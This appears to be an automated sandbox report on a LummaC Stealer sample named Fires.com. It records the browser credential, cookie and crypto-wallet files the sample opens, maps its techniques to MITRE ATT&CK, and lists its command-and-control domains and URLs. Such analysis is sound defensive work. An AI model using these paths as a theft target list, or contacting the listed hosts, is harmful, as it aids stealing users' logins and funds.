Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Fires.com	Binary or memory string: WIN_81
Source: Fires.com	Binary or memory string: WIN_XP
Source: Fires.com.1.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Fires.com	Binary or memory string: WIN_XPe
Source: Fires.com	Binary or memory string: WIN_VISTA
Source: Fires.com	Binary or memory string: WIN_7
Source: Fires.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DC2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		12_2_00DC2263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DC1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		12_2_00DC1C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	111 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	321 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	321 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://beattalkerz.cyou:443/api84%76%90%49%72%74%74%86%84%84%86%75%72%91%80%86%85%90%49%72%74%74%86	0%	Avira URL Cloud	safe
https://beattalkerz.cyou/HOeS	0%	Avira URL Cloud	safe
https://beattalkerz.cyou/api(	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txtM)	100%	Avira URL Cloud	malware
https://klipvumisui.shop/int_clp_sha.txtp	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txteK	100%	Avira URL Cloud	malware
https://beattalkerz.cyou:443/api	100%	Avira URL Cloud	malware
https://beattalkerz.cyou/api	100%	Avira URL Cloud	malware
https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK	100%	Avira URL Cloud	malware
https://klipvumisui.shop:443/int_clp_sha.txt	100%	Avira URL Cloud	malware
https://beattalkerz.cyou/api)	0%	Avira URL Cloud	safe
https://beattalkerz.cyou:443/api9%107%112%118%113%107%113%105%118%53%111%122%105%118%124%123%53%118%	0%	Avira URL Cloud	safe
https://klipvumisui.shop/int_clp_sha.txt~	100%	Avira URL Cloud	malware
https://klipvumisui.shop/int_clp_sha.txtX	100%	Avira URL Cloud	malware
https://klipvumisui.shop/Bp	100%	Avira URL Cloud	malware
beattalkerz.cyou	0%	Avira URL Cloud	safe
https://beattalkerz.cyou:443/apin.txtPK	0%	Avira URL Cloud	safe
https://beattalkerz.cyou/apibu	0%	Avira URL Cloud	safe
https://beattalkerz.cyou/gf06r/rqanYKzRPHTmgGhjuyoc	0%	Avira URL Cloud	safe
https://klipvumisui.shop/int_clp_sha.txtQD	100%	Avira URL Cloud	malware
https://beattalkerz.cyou/p	0%	Avira URL Cloud	safe
https://beattalkerz.cyou/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
beattalkerz.cyou	104.21.25.52	true	true	unknown
oTTuWZUCpWztYYToeMvyHdVgao.oTTuWZUCpWztYYToeMvyHdVgao	unknown	unknown	false	unknown
dfgh.online	unknown	unknown	false	high
klipvumisui.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://beattalkerz.cyou/api	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	false		high
wholersorie.shop	false		high
beattalkerz.cyou	true	Avira URL Cloud: safe	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
https://cegu.shop/8574262446/ph.txt	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://beattalkerz.cyou:443/api84%76%90%49%72%74%74%86%84%84%86%75%72%91%80%86%85%90%49%72%74%74%86	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou:443/api	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipvumisui.shop:443/int_clp_sha.txt	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoft	powershell.exe, 00000011.00000002.2235769377.0000000007328000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou/HOeS	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000011.00000002.2230662155.0000000002CC2000.00000004.00000020.00020000.00000000.sdmp	false		high
